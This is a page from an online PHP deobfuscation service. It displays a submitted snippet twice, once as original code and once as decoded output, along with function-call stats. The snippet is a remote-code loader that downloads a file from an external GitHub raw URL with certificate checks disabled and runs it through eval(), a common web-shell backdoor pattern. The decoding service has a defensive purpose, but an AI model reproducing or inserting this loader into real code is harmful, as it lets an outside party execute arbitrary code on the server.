Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
function getCurlk2($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); ..
Decoded Output download
<? function getCurlk2($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$str=getCurlk2("https://raw.githubusercontent.com/michgrayy/idk-files/main/radio.txt");
echo eval("?>".(($str)));
?>
Did this file decode correctly?
Original Code
function getCurlk2($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$str=getCurlk2("https://raw.githubusercontent.com/michgrayy/idk-files/main/radio.txt");
echo eval("?>".(($str)));
?>
Function Calls
curl_init | 1 |
getCurlk2 | 1 |
Stats
MD5 | 0e56d1ff2c0c5ee159010aa2bf45cd1c |
Eval Count | 0 |
Decode Time | 40 ms |